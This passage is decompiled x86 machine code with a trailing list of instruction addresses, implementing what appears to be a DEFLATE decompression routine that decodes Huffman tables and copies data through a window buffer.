                                                        												__ecx = __esi[0x26e9];
                                                        												__eflags = __edi - __ecx;
                                                        												 *(__ebp - 0x30) = __edi;
                                                        												if(__edi >= __ecx) {
                                                        													__eax = __esi[0x26e8];
                                                        													__eax = __esi[0x26e8] - __edi;
                                                        													__eflags = __eax;
                                                        												} else {
                                                        													__ecx = __ecx - __edi;
                                                        													__eax = __ecx - __edi - 1;
                                                        												}
                                                        												__edx = __esi[0x26e8];
                                                        												__eflags = __edi - __edx;
                                                        												 *(__ebp - 8) = __edx;
                                                        												if(__edi == __edx) {
                                                        													__edx =  &(__esi[0x6e8]);
                                                        													__eflags = __ecx - __edx;
                                                        													if(__ecx != __edx) {
                                                        														__edi = __edx;
                                                        														__eflags = __edi - __ecx;
                                                        														 *(__ebp - 0x30) = __edi;
                                                        														if(__edi >= __ecx) {
                                                        															__eax =  *(__ebp - 8);
                                                        															__eax =  *(__ebp - 8) - __edi;
                                                        															__eflags = __eax;
                                                        														} else {
                                                        															__ecx = __ecx - __edi;
                                                        															__eax = __ecx;
                                                        														}
                                                        													}
                                                        												}
                                                        												__eflags = __eax;
                                                        												if(__eax == 0) {
                                                        													goto L160;
                                                        												} else {
                                                        													goto L149;
                                                        												}
                                                        											}
                                                        											L135:
                                                        											__eax = __esi[0x26e9];
                                                        											__edx =  &(__esi[0x6e8]);
                                                        											__eflags = __eax - __edx;
                                                        											if(__eax == __edx) {
                                                        												goto L140;
                                                        											}
                                                        											L136:
                                                        											__edi = __edx;
                                                        											__eflags = __edi - __eax;
                                                        											if(__edi >= __eax) {
                                                        												__ecx = __ecx - __edi;
                                                        												__eflags = __ecx;
                                                        												__eax = __ecx;
                                                        											} else {
                                                        												__eax = __eax - __edi;
                                                        												__eax = __eax - 1;
                                                        											}
                                                        											__eflags = __eax;
                                                        											if(__eax != 0) {
                                                        												goto L149;
                                                        											} else {
                                                        												goto L140;
                                                        											}
                                                        										case 7:
                                                        											L150:
                                                        											__eflags = __ebx - 7;
                                                        											if(__ebx > 7) {
                                                        												__ebx = __ebx - 8;
                                                        												 *(__ebp - 0x34) =  *(__ebp - 0x34) + 1;
                                                        												_t351 = __ebp - 0x38;
                                                        												 *_t351 =  *(__ebp - 0x38) - 1;
                                                        												__eflags =  *_t351;
                                                        											}
                                                        											goto L152;
                                                        										case 8:
                                                        											L4:
                                                        											while(_t396 < 3) {
                                                        												if( *(_t419 - 0x34) == 0) {
                                                        													goto L159;
                                                        												} else {
                                                        													 *(_t419 - 0x34) =  *(_t419 - 0x34) - 1;
                                                        													 *(_t419 - 0x40) =  *(_t419 - 0x40) | ( *( *(_t419 - 0x38)) & 0x000000ff) << _t396;
                                                        													 *(_t419 - 0x38) =  &(( *(_t419 - 0x38))[1]);
                                                        													_t396 = _t396 + 8;
                                                        													continue;
                                                        												}
                                                        											}
                                                        											_t396 = _t396 - 3;
                                                        											 *(_t419 - 0x40) =  *(_t419 - 0x40) >> 3;
                                                        											_t377 =  *(_t419 - 0x40) & 0x00000007;
                                                        											asm("sbb ecx, ecx");
                                                        											_t379 = _t377 >> 1;
                                                        											_t417[0x145] = ( ~(_t377 & 0x00000001) & 0x00000007) + 8;
                                                        											if(_t379 == 0) {
                                                        												L24:
                                                        												 *_t417 = 9;
                                                        												_t407 = _t396 & 0x00000007;
                                                        												 *(_t419 - 0x40) =  *(_t419 - 0x40) >> _t407;
                                                        												_t396 = _t396 - _t407;
                                                        												goto L157;
                                                        											}
                                                        											L6:
                                                        											_t382 = _t379 - 1;
                                                        											if(_t382 == 0) {
                                                        												L13:
                                                        												__eflags =  *0x42e3a8;
                                                        												if( *0x42e3a8 != 0) {
                                                        													L22:
                                                        													_t383 =  *0x40a42c; // 0x9
                                                        													_t417[4] = _t383;
                                                        													_t384 =  *0x40a430; // 0x5
                                                        													_t417[4] = _t384;
                                                        													_t385 =  *0x42d224; // 0x42db28
                                                        													_t417[5] = _t385;
                                                        													_t386 =  *0x42d220; // 0x42e328
                                                        													_t417[6] = _t386;
                                                        													L23:
                                                        													 *_t417 =  *_t417 & 0x00000000;
                                                        													goto L157;
                                                        												} else {
                                                        													_t26 = _t419 - 8;
                                                        													 *_t26 =  *(_t419 - 8) & 0x00000000;
                                                        													__eflags =  *_t26;
                                                        													_t387 = 0x42d228;
                                                        													do {
                                                        														L15:
                                                        														__eflags = _t387 - 0x42d464;
                                                        														_t409 = 8;
                                                        														if(_t387 > 0x42d464) {
                                                        															__eflags = _t387 - 0x42d628;
                                                        															if(_t387 >= 0x42d628) {
                                                        																__eflags = _t387 - 0x42d688;
                                                        																if(_t387 < 0x42d688) {
                                                        																	_t409 = 7;
                                                        																}
                                                        															} else {
                                                        																_t409 = 9;
                                                        															}
                                                        														}
                                                        														L20:
                                                        														 *_t387 = _t409;
                                                        														_t387 = _t387 + 4;
                                                        														__eflags = _t387 - 0x42d6a8;
                                                        													} while (_t387 < 0x42d6a8);
                                                        													E0040711C(0x42d228, 0x120, 0x101, 0x40841c, 0x40845c, 0x42d224, 0x40a42c, 0x42db28, _t419 - 8);
                                                        													_push(0x1e);
                                                        													_pop(_t411);
                                                        													_push(5);
                                                        													_pop(_t390);
                                                        													memset(0x42d228, _t390, _t411 << 2);
                                                        													_t421 = _t421 + 0xc;
                                                        													_t413 = 0x42d228 + _t411;
                                                        													E0040711C(0x42d228, 0x1e, 0, 0x40849c, 0x4084d8, "(�B", 0x40a430, 0x42db28, _t419 - 8);
                                                        													 *0x42e3a8 =  *0x42e3a8 + 1;
                                                        													__eflags =  *0x42e3a8;
                                                        													goto L22;
                                                        												}
                                                        											}
                                                        											L7:
                                                        											_t394 = _t382 - 1;
                                                        											if(_t394 == 0) {
                                                        												 *_t417 = 0xb;
                                                        												goto L157;
                                                        											}
                                                        											L8:
                                                        											if(_t394 != 1) {
                                                        												goto L157;
                                                        											}
                                                        											goto L9;
                                                        										case 9:
                                                        											while(1) {
                                                        												L27:
                                                        												__eflags = __ebx - 0x20;
                                                        												if(__ebx >= 0x20) {
                                                        													break;
                                                        												}
                                                        												L25:
                                                        												__eflags =  *(__ebp - 0x34);
                                                        												if( *(__ebp - 0x34) == 0) {
                                                        													goto L159;
                                                        												}
                                                        												L26:
                                                        												__eax =  *(__ebp - 0x38);
                                                        												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                        												__ecx = __ebx;
                                                        												 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                        												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                        												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                        												__ebx = __ebx + 8;
                                                        												__eflags = __ebx;
                                                        											}
                                                        											L28:
                                                        											__eax =  *(__ebp - 0x40);
                                                        											__ebx = 0;
                                                        											__eax =  *(__ebp - 0x40) & 0x0000ffff;
                                                        											 *(__ebp - 0x40) = 0;
                                                        											__eflags = __eax;
                                                        											__esi[1] = __eax;
                                                        											if(__eax == 0) {
                                                        												goto L53;
                                                        											}
                                                        											L29:
                                                        											_push(0xa);
                                                        											_pop(__eax);
                                                        											goto L54;
                                                        										case 0xa:
                                                        											L30:
                                                        											__eflags =  *(__ebp - 0x34);
                                                        											if( *(__ebp - 0x34) == 0) {
                                                        												goto L159;
                                                        											}
                                                        											L31:
                                                        											__eax =  *(__ebp - 0x2c);
                                                        											__eflags = __eax;
                                                        											if(__eax != 0) {
                                                        												L48:
                                                        												__eflags = __eax -  *(__ebp - 0x34);
                                                        												if(__eax >=  *(__ebp - 0x34)) {
                                                        													__eax =  *(__ebp - 0x34);
                                                        												}
                                                        												__ecx = __esi[1];
                                                        												__eflags = __ecx - __eax;
                                                        												__edi = __ecx;
                                                        												if(__ecx >= __eax) {
                                                        													__edi = __eax;
                                                        												}
                                                        												__eax = E00405C4B( *(__ebp - 0x30),  *(__ebp - 0x38), __edi);
                                                        												 *(__ebp - 0x38) =  *(__ebp - 0x38) + __edi;
                                                        												 *(__ebp - 0x34) =  *(__ebp - 0x34) - __edi;
                                                        												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __edi;
                                                        												 *(__ebp - 0x2c) =  *(__ebp - 0x2c) - __edi;
                                                        												_t80 =  &(__esi[1]);
                                                        												 *_t80 = __esi[1] - __edi;
                                                        												__eflags =  *_t80;
                                                        												if( *_t80 == 0) {
                                                        													L53:
                                                        													__eax = __esi[0x145];
                                                        													L54:
                                                        													 *__esi = __eax;
                                                        												}
                                                        												goto L157;
                                                        											}
                                                        											L32:
                                                        											__ecx = __esi[0x26e8];
                                                        											__edx =  *(__ebp - 0x30);
                                                        											__eflags = __edx - __ecx;
                                                        											if(__edx != __ecx) {
                                                        												L38:
                                                        												__esi[0x26ea] = __edx;
                                                        												__eax = E004070B4( *((intOrPtr*)(__ebp + 8)));
                                                        												__edx = __esi[0x26ea];
                                                        												__ecx = __esi[0x26e9];
                                                        												__eflags = __edx - __ecx;
                                                        												 *(__ebp - 0x30) = __edx;
                                                        												if(__edx >= __ecx) {
                                                        													__eax = __esi[0x26e8];
                                                        													__eax = __esi[0x26e8] - __edx;
                                                        													__eflags = __eax;
                                                        												} else {
                                                        													__ecx = __ecx - __edx;
                                                        													__eax = __ecx - __edx - 1;
                                                        												}
                                                        												__edi = __esi[0x26e8];
                                                        												 *(__ebp - 0x2c) = __eax;
                                                        												__eflags = __edx - __edi;
                                                        												if(__edx == __edi) {
                                                        													__edx =  &(__esi[0x6e8]);
                                                        													__eflags = __edx - __ecx;
                                                        													if(__eflags != 0) {
                                                        														 *(__ebp - 0x30) = __edx;
                                                        														if(__eflags >= 0) {
                                                        															__edi = __edi - __edx;
                                                        															__eflags = __edi;
                                                        															__eax = __edi;
                                                        														} else {
                                                        															__ecx = __ecx - __edx;
                                                        															__eax = __ecx;
                                                        														}
                                                        														 *(__ebp - 0x2c) = __eax;
                                                        													}
                                                        												}
                                                        												__eflags = __eax;
                                                        												if(__eax == 0) {
                                                        													goto L160;
                                                        												} else {
                                                        													goto L48;
                                                        												}
                                                        											}
                                                        											L33:
                                                        											__eax = __esi[0x26e9];
                                                        											__edi =  &(__esi[0x6e8]);
                                                        											__eflags = __eax - __edi;
                                                        											if(__eax == __edi) {
                                                        												goto L38;
                                                        											}
                                                        											L34:
                                                        											__edx = __edi;
                                                        											__eflags = __edx - __eax;
                                                        											 *(__ebp - 0x30) = __edx;
                                                        											if(__edx >= __eax) {
                                                        												__ecx = __ecx - __edx;
                                                        												__eflags = __ecx;
                                                        												__eax = __ecx;
                                                        											} else {
                                                        												__eax = __eax - __edx;
                                                        												__eax = __eax - 1;
                                                        											}
                                                        											__eflags = __eax;
                                                        											 *(__ebp - 0x2c) = __eax;
                                                        											if(__eax != 0) {
                                                        												goto L48;
                                                        											} else {
                                                        												goto L38;
                                                        											}
                                                        										case 0xb:
                                                        											goto L56;
                                                        										case 0xc:
                                                        											L60:
                                                        											__esi[1] = __esi[1] >> 0xa;
                                                        											__eax = (__esi[1] >> 0xa) + 4;
                                                        											if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
                                                        												goto L68;
                                                        											}
                                                        											goto L61;
                                                        										case 0xd:
                                                        											while(1) {
                                                        												L93:
                                                        												__eax = __esi[1];
                                                        												__ecx = __esi[2];
                                                        												__edx = __eax;
                                                        												__eax = __eax & 0x0000001f;
                                                        												__edx = __edx >> 5;
                                                        												__eax = __edx + __eax + 0x102;
                                                        												__eflags = __esi[2] - __eax;
                                                        												if(__esi[2] >= __eax) {
                                                        													break;
                                                        												}
                                                        												L73:
                                                        												__eax = __esi[0x143];
                                                        												while(1) {
                                                        													L76:
                                                        													__eflags = __ebx - __eax;
                                                        													if(__ebx >= __eax) {
                                                        														break;
                                                        													}
                                                        													L74:
                                                        													__eflags =  *(__ebp - 0x34);
                                                        													if( *(__ebp - 0x34) == 0) {
                                                        														goto L159;
                                                        													}
                                                        													L75:
                                                        													__ecx =  *(__ebp - 0x38);
                                                        													 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                        													__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                        													__ecx = __ebx;
                                                        													__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                        													 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                        													 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                        													__ebx = __ebx + 8;
                                                        													__eflags = __ebx;
                                                        												}
                                                        												L77:
                                                        												__eax =  *(0x40a408 + __eax * 2) & 0x0000ffff;
                                                        												__eax = __eax &  *(__ebp - 0x40);
                                                        												__ecx = __esi[0x144];
                                                        												__eax = __esi[0x144] + __eax * 4;
                                                        												__edx =  *(__eax + 1) & 0x000000ff;
                                                        												__eax =  *(__eax + 2) & 0x0000ffff;
                                                        												__eflags = __eax - 0x10;
                                                        												 *(__ebp - 0x14) = __eax;
                                                        												if(__eax >= 0x10) {
                                                        													L79:
                                                        													__eflags = __eax - 0x12;
                                                        													if(__eax != 0x12) {
                                                        														__eax = __eax + 0xfffffff2;
                                                        														 *(__ebp - 8) = 3;
                                                        													} else {
                                                        														_push(7);
                                                        														 *(__ebp - 8) = 0xb;
                                                        														_pop(__eax);
                                                        													}
                                                        													while(1) {
                                                        														L84:
                                                        														__ecx = __eax + __edx;
                                                        														__eflags = __ebx - __eax + __edx;
                                                        														if(__ebx >= __eax + __edx) {
                                                        															break;
                                                        														}
                                                        														L82:
                                                        														__eflags =  *(__ebp - 0x34);
                                                        														if( *(__ebp - 0x34) == 0) {
                                                        															goto L159;
                                                        														}
                                                        														L83:
                                                        														__ecx =  *(__ebp - 0x38);
                                                        														 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                        														__edi =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                        														__ecx = __ebx;
                                                        														__edi = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                        														 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                        														 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                        														__ebx = __ebx + 8;
                                                        														__eflags = __ebx;
                                                        													}
                                                        													L85:
                                                        													__ecx = __edx;
                                                        													__ebx = __ebx - __edx;
                                                        													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                        													 *(0x40a408 + __eax * 2) & 0x0000ffff =  *(0x40a408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                                                        													__edx =  *(__ebp - 8);
                                                        													__ebx = __ebx - __eax;
                                                        													__edx =  *(__ebp - 8) + ( *(0x40a408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                                                        													__ecx = __eax;
                                                        													__eax = __esi[1];
                                                        													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                        													__ecx = __esi[2];
                                                        													__eax = __eax >> 5;
                                                        													__edi = __eax >> 0x00000005 & 0x0000001f;
                                                        													__eax = __eax & 0x0000001f;
                                                        													__eax = __edi + __eax + 0x102;
                                                        													__edi = __edx + __ecx;
                                                        													__eflags = __edx + __ecx - __eax;
                                                        													if(__edx + __ecx > __eax) {
                                                        														goto L9;
                                                        													}
                                                        													L86:
                                                        													__eflags =  *(__ebp - 0x14) - 0x10;
                                                        													if( *(__ebp - 0x14) != 0x10) {
                                                        														L89:
                                                        														__edi = 0;
                                                        														__eflags = 0;
                                                        														L90:
                                                        														__eax = __esi + 0xc + __ecx * 4;
                                                        														do {
                                                        															L91:
                                                        															 *__eax = __edi;
                                                        															__ecx = __ecx + 1;
                                                        															__eax = __eax + 4;
                                                        															__edx = __edx - 1;
                                                        															__eflags = __edx;
                                                        														} while (__edx != 0);
                                                        														__esi[2] = __ecx;
                                                        														continue;
                                                        													}
                                                        													L87:
                                                        													__eflags = __ecx - 1;
                                                        													if(__ecx < 1) {
                                                        														goto L9;
                                                        													}
                                                        													L88:
                                                        													__edi =  *(__esi + 8 + __ecx * 4);
                                                        													goto L90;
                                                        												}
                                                        												L78:
                                                        												__ecx = __edx;
                                                        												__ebx = __ebx - __edx;
                                                        												 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                        												__ecx = __esi[2];
                                                        												 *(__esi + 0xc + __esi[2] * 4) = __eax;
                                                        												__esi[2] = __esi[2] + 1;
                                                        											}
                                                        											L94:
                                                        											__eax = __esi[1];
                                                        											__esi[0x144] = __esi[0x144] & 0x00000000;
                                                        											 *(__ebp - 0xc) =  *(__ebp - 0xc) & 0x00000000;
                                                        											__edi = __eax;
                                                        											__eax = __eax >> 5;
                                                        											__edi = __edi & 0x0000001f;
                                                        											__ecx = 0x101;
                                                        											__eax = __eax & 0x0000001f;
                                                        											__edi = __edi + 0x101;
                                                        											__eax = __eax + 1;
                                                        											__edx = __ebp - 0xc;
                                                        											 *(__ebp - 0x14) = __eax;
                                                        											 &(__esi[0x148]) = __ebp - 4;
                                                        											 *(__ebp - 4) = 9;
                                                        											__ebp - 0x18 =  &(__esi[3]);
                                                        											 *(__ebp - 0x10) = 6;
                                                        											__eax = E0040711C( &(__esi[3]), __edi, 0x101, 0x40841c, 0x40845c, __ebp - 0x18, __ebp - 4,  &(__esi[0x148]), __ebp - 0xc);
                                                        											__eflags =  *(__ebp - 4);
                                                        											if( *(__ebp - 4) == 0) {
                                                        												__eax = __eax | 0xffffffff;
                                                        												__eflags = __eax;
                                                        											}
                                                        											__eflags = __eax;
                                                        											if(__eax != 0) {
                                                        												goto L9;
                                                        											} else {
                                                        												L97:
                                                        												__ebp - 0xc =  &(__esi[0x148]);
                                                        												__ebp - 0x10 = __ebp - 0x1c;
                                                        												__eax = __esi + 0xc + __edi * 4;
                                                        												__eax = E0040711C(__esi + 0xc + __edi * 4,  *(__ebp - 0x14), 0, 0x40849c, 0x4084d8, __ebp - 0x1c, __ebp - 0x10,  &(__esi[0x148]), __ebp - 0xc);
                                                        												__eflags = __eax;
                                                        												if(__eax != 0) {
                                                        													goto L9;
                                                        												}
                                                        												L98:
                                                        												__eax =  *(__ebp - 0x10);
                                                        												__eflags =  *(__ebp - 0x10);
                                                        												if( *(__ebp - 0x10) != 0) {
                                                        													L100:
                                                        													__cl =  *(__ebp - 4);
                                                        													 *__esi =  *__esi & 0x00000000;
                                                        													__eflags =  *__esi;
                                                        													__esi[4] = __al;
                                                        													__eax =  *(__ebp - 0x18);
                                                        													__esi[5] =  *(__ebp - 0x18);
                                                        													__eax =  *(__ebp - 0x1c);
                                                        													__esi[4] = __cl;
                                                        													__esi[6] =  *(__ebp - 0x1c);
                                                        													goto L101;
                                                        												}
                                                        												L99:
                                                        												__eflags = __edi - 0x101;
                                                        												if(__edi > 0x101) {
                                                        													goto L9;
                                                        												}
                                                        												goto L100;
                                                        											}
                                                        										case 0xe:
                                                        											goto L9;
                                                        										case 0xf:
                                                        											L152:
                                                        											__eax =  *(__ebp - 0x30);
                                                        											__esi[0x26ea] =  *(__ebp - 0x30);
                                                        											__eax = E004070B4( *((intOrPtr*)(__ebp + 8)));
                                                        											__ecx = __esi[0x26ea];
                                                        											__edx = __esi[0x26e9];
                                                        											__eflags = __ecx - __edx;
                                                        											 *(__ebp - 0x30) = __ecx;
                                                        											if(__ecx >= __edx) {
                                                        												__eax = __esi[0x26e8];
                                                        												__eax = __esi[0x26e8] - __ecx;
                                                        												__eflags = __eax;
                                                        											} else {
                                                        												__edx = __edx - __ecx;
                                                        												__eax = __edx - __ecx - 1;
                                                        											}
                                                        											__eflags = __ecx - __edx;
                                                        											 *(__ebp - 0x2c) = __eax;
                                                        											if(__ecx != __edx) {
                                                        												L160:
                                                        												__edi = 0;
                                                        												goto L10;
                                                        											} else {
                                                        												L156:
                                                        												__eax = __esi[0x145];
                                                        												__eflags = __eax - 8;
                                                        												 *__esi = __eax;
                                                        												if(__eax != 8) {
                                                        													L161:
                                                        													0 = 1;
                                                        													goto L10;
                                                        												}
                                                        												goto L157;
                                                        											}
                                                        									}
                                                        								}
                                                        								L158:
                                                        								goto L9;
                                                        							}
                                                        							L70:
                                                        							if( *__edi == __eax) {
                                                        								goto L72;
                                                        							}
                                                        							L71:
                                                        							__esi[2] = __esi[2] & __eax;
                                                        							 *__esi = 0xd;
                                                        							goto L93;
                                                        						}
                                                        					}
                                                        				}
                                                        				L159:
                                                        				_t414 = 0;
                                                        				_t417[0x147] =  *(_t419 - 0x40);
                                                        				_t417[0x146] = _t396;
                                                        				( *(_t419 + 8))[1] = 0;
                                                        				goto L11;
                                                        			}









                                                        0x00406945
                                                        0x00406945
                                                        0x00406945
                                                        0x00406945
                                                        0x00406945
                                                        0x00406949
                                                        0x00000000
                                                        0x00000000
                                                        0x0040694f
                                                        0x0040694f
                                                        0x00406952
                                                        0x00406955
                                                        0x0040695a
                                                        0x0040695c
                                                        0x0040695f
                                                        0x00406962
                                                        0x00406965
                                                        0x00406965
                                                        0x00406968
                                                        0x00000000
                                                        0x00000000
                                                        0x0040696a
                                                        0x0040696a
                                                        0x0040696d
                                                        0x00406972
                                                        0x00406974
                                                        0x00406977
                                                        0x0040697d
                                                        0x004066dc
                                                        0x004066dc
                                                        0x004066df
                                                        0x004066e5
                                                        0x004066eb
                                                        0x004066f4
                                                        0x004066fa
                                                        0x004066fd
                                                        0x00406704
                                                        0x00406709
                                                        0x0040670f
                                                        0x0040671a
                                                        0x0040671a
                                                        0x00406983
                                                        0x00406983
                                                        0x0040698d
                                                        0x00000000
                                                        0x00000000
                                                        0x00406993
                                                        0x00406993
                                                        0x00406997
                                                        0x0040699a
                                                        0x0040699a
                                                        0x0040699e
                                                        0x004069a4
                                                        0x004069a4
                                                        0x004069a7
                                                        0x004069aa
                                                        0x004069b0
                                                        0x00000000
                                                        0x00000000
                                                        0x004069b2
                                                        0x004069d4
                                                        0x004069d4
                                                        0x004069d7
                                                        0x00000000
                                                        0x00000000
                                                        0x004069b4
                                                        0x004069b8
                                                        0x00000000
                                                        0x00000000
                                                        0x004069be
                                                        0x004069be
                                                        0x004069c1
                                                        0x004069c4
                                                        0x004069c9
                                                        0x004069cb
                                                        0x004069ce
                                                        0x004069d1
                                                        0x004069d1
                                                        0x004069d9
                                                        0x004069d9
                                                        0x004069df
                                                        0x004069e2
                                                        0x004069e5
                                                        0x004069e5
                                                        0x004069ec
                                                        0x004069f0
                                                        0x004069f4
                                                        0x004069f7
                                                        0x004069fa
                                                        0x00406a00
                                                        0x00406a05
                                                        0x00000000
                                                        0x00000000
                                                        0x00406a07
                                                        0x00406a1b
                                                        0x00406a1b
                                                        0x00406a1f
                                                        0x00000000
                                                        0x00000000
                                                        0x00406a09
                                                        0x00406a0c
                                                        0x00406a0c
                                                        0x00406a13
                                                        0x00406a18
                                                        0x00406a18
                                                        0x00406a18
                                                        0x00406a21
                                                        0x00406a21
                                                        0x00406a24
                                                        0x00406a32
                                                        0x00406a38
                                                        0x00406a3d
                                                        0x00406a43
                                                        0x00406a49
                                                        0x00406a4f
                                                        0x00406a56
                                                        0x00406a6a
                                                        0x00406a6a
                                                        0x00407039
                                                        0x00407039
                                                        0x00407039
                                                        0x0040703e
                                                        0x00000000
                                                        0x00000000
                                                        0x00406676
                                                        0x00406676
                                                        0x00000000
                                                        0x00406c71
                                                        0x00406c71
                                                        0x00406c75
                                                        0x00406c78
                                                        0x00406c7b
                                                        0x00406c7e
                                                        0x00000000
                                                        0x00000000
                                                        0x00406c84
                                                        0x00406c84
                                                        0x00406ca9
                                                        0x00406ca9
                                                        0x00406ca9
                                                        0x00406cab
                                                        0x00000000
                                                        0x00000000
                                                        0x00406c89
                                                        0x00406c89
                                                        0x00406c8d
                                                        0x00000000
                                                        0x00000000
                                                        0x00406c93
                                                        0x00406c93
                                                        0x00406c96
                                                        0x00406c99
                                                        0x00406c9c
                                                        0x00406c9e
                                                        0x00406ca0
                                                        0x00406ca3
                                                        0x00406ca6
                                                        0x00406ca6
                                                        0x00406ca6
                                                        0x00406cad
                                                        0x00406cad
                                                        0x00406cb5
                                                        0x00406cb8
                                                        0x00406cbb
                                                        0x00406cbe
                                                        0x00406cc2
                                                        0x00406cc5
                                                        0x00406cc7
                                                        0x00406cca
                                                        0x00406ccc
                                                        0x00406ce0
                                                        0x00406ce0
                                                        0x00406ce3
                                                        0x00406cfd
                                                        0x00406cfd
                                                        0x00406d00
                                                        0x00000000
                                                        0x00000000
                                                        0x00406d06
                                                        0x00406d06
                                                        0x00406d09
                                                        0x00000000
                                                        0x00000000
                                                        0x00406d0f
                                                        0x00406d0f
                                                        0x00000000
                                                        0x00406d0f
                                                        0x00406ce5
                                                        0x00406ce8
                                                        0x00406cef
                                                        0x00406cf2
                                                        0x00000000
                                                        0x00406cf2
                                                        0x00406cce
                                                        0x00406cd2
                                                        0x00406cd5
                                                        0x00000000
                                                        0x00000000
                                                        0x00406d1a
                                                        0x00406d1a
                                                        0x00406d3f
                                                        0x00406d3f
                                                        0x00406d3f
                                                        0x00406d41
                                                        0x00000000
                                                        0x00000000
                                                        0x00406d1f
                                                        0x00406d1f
                                                        0x00406d23
                                                        0x00000000
                                                        0x00000000
                                                        0x00406d29
                                                        0x00406d29
                                                        0x00406d2c
                                                        0x00406d2f
                                                        0x00406d32
                                                        0x00406d34
                                                        0x00406d36
                                                        0x00406d39
                                                        0x00406d3c
                                                        0x00406d3c
                                                        0x00406d3c
                                                        0x00406d43
                                                        0x00406d4b
                                                        0x00406d4e
                                                        0x00406d51
                                                        0x00406d53
                                                        0x00406d56
                                                        0x00406d56
                                                        0x00406d58
                                                        0x00406d5c
                                                        0x00406d5f
                                                        0x00406d62
                                                        0x00406d65
                                                        0x00000000
                                                        0x00000000
                                                        0x00406d6b
                                                        0x00406d6b
                                                        0x00406d90
                                                        0x00406d90
                                                        0x00406d90
                                                        0x00406d92
                                                        0x00000000
                                                        0x00000000
                                                        0x00406d70
                                                        0x00406d70
                                                        0x00406d74
                                                        0x00000000
                                                        0x00000000
                                                        0x00406d7a
                                                        0x00406d7a
                                                        0x00406d7d
                                                        0x00406d80
                                                        0x00406d83
                                                        0x00406d85
                                                        0x00406d87
                                                        0x00406d8a
                                                        0x00406d8d
                                                        0x00406d8d
                                                        0x00406d8d
                                                        0x00406d94
                                                        0x00406d94
                                                        0x00406d9c
                                                        0x00406d9f
                                                        0x00406da2
                                                        0x00406da5
                                                        0x00406da9
                                                        0x00406dac
                                                        0x00406dae
                                                        0x00406db1
                                                        0x00406db4
                                                        0x00406dce
                                                        0x00406dce
                                                        0x00406dd1
                                                        0x00000000
                                                        0x00000000
                                                        0x00406dd7
                                                        0x00406dd7
                                                        0x00406dda
                                                        0x00406de1
                                                        0x00000000
                                                        0x00406de1
                                                        0x00406db6
                                                        0x00406db9
                                                        0x00406dc0
                                                        0x00406dc3
                                                        0x00000000
                                                        0x00000000
                                                        0x00406de9
                                                        0x00406de9
                                                        0x00406e0e
                                                        0x00406e0e
                                                        0x00406e0e
                                                        0x00406e10
                                                        0x00000000
                                                        0x00000000
                                                        0x00406dee
                                                        0x00406dee
                                                        0x00406df2
                                                        0x00000000
                                                        0x00000000
                                                        0x00406df8
                                                        0x00406df8
                                                        0x00406dfb
                                                        0x00406dfe
                                                        0x00406e01
                                                        0x00406e03
                                                        0x00406e05
                                                        0x00406e08
                                                        0x00406e0b
                                                        0x00406e0b
                                                        0x00406e0b
                                                        0x00406e12
                                                        0x00406e1a
                                                        0x00406e1d
                                                        0x00406e20
                                                        0x00406e22
                                                        0x00406e25
                                                        0x00406e27
                                                        0x00000000
                                                        0x00000000
                                                        0x00406e2d
                                                        0x00406e2d
                                                        0x00406e30
                                                        0x00406e31
                                                        0x00406e32
                                                        0x00406e34
                                                        0x00406e38
                                                        0x00000000
                                                        0x00406f33
                                                        0x00406f33
                                                        0x00406f36
                                                        0x00406f39
                                                        0x00406f3b
                                                        0x00406fd2
                                                        0x00406fd2
                                                        0x00406fd5
                                                        0x00406fd7
                                                        0x00406fd8
                                                        0x00406fd9
                                                        0x00406fdc
                                                        0x00000000
                                                        0x00406fdc
                                                        0x00406f41
                                                        0x00406f41
                                                        0x00406f47
                                                        0x00406f49
                                                        0x00406f6e
                                                        0x00406f71
                                                        0x00406f77
                                                        0x00406f7c
                                                        0x00406f82
                                                        0x00406f88
                                                        0x00406f8a
                                                        0x00406f8d
                                                        0x00406f96
                                                        0x00406f9c
                                                        0x00406f9c
                                                        0x00406f8f
                                                        0x00406f91
                                                        0x00406f93
                                                        0x00406f93
                                                        0x00406f9e
                                                        0x00406fa4
                                                        0x00406fa6
                                                        0x00406fa9
                                                        0x00406fab
                                                        0x00406fb1
                                                        0x00406fb3
                                                        0x00406fb5
                                                        0x00406fb7
                                                        0x00406fb9
                                                        0x00406fbc
                                                        0x00406fc5
                                                        0x00406fc8
                                                        0x00406fc8
                                                        0x00406fbe
                                                        0x00406fbe
                                                        0x00406fc1
                                                        0x00406fc1
                                                        0x00406fbc
                                                        0x00406fb3
                                                        0x00406fca
                                                        0x00406fcc
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00406fcc
                                                        0x00406f4b
                                                        0x00406f4b
                                                        0x00406f51
                                                        0x00406f57
                                                        0x00406f59
                                                        0x00000000
                                                        0x00000000
                                                        0x00406f5b
                                                        0x00406f5b
                                                        0x00406f5d
                                                        0x00406f5f
                                                        0x00406f66
                                                        0x00406f66
                                                        0x00406f68
                                                        0x00406f61
                                                        0x00406f61
                                                        0x00406f63
                                                        0x00406f63
                                                        0x00406f6a
                                                        0x00406f6c
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00406fe4
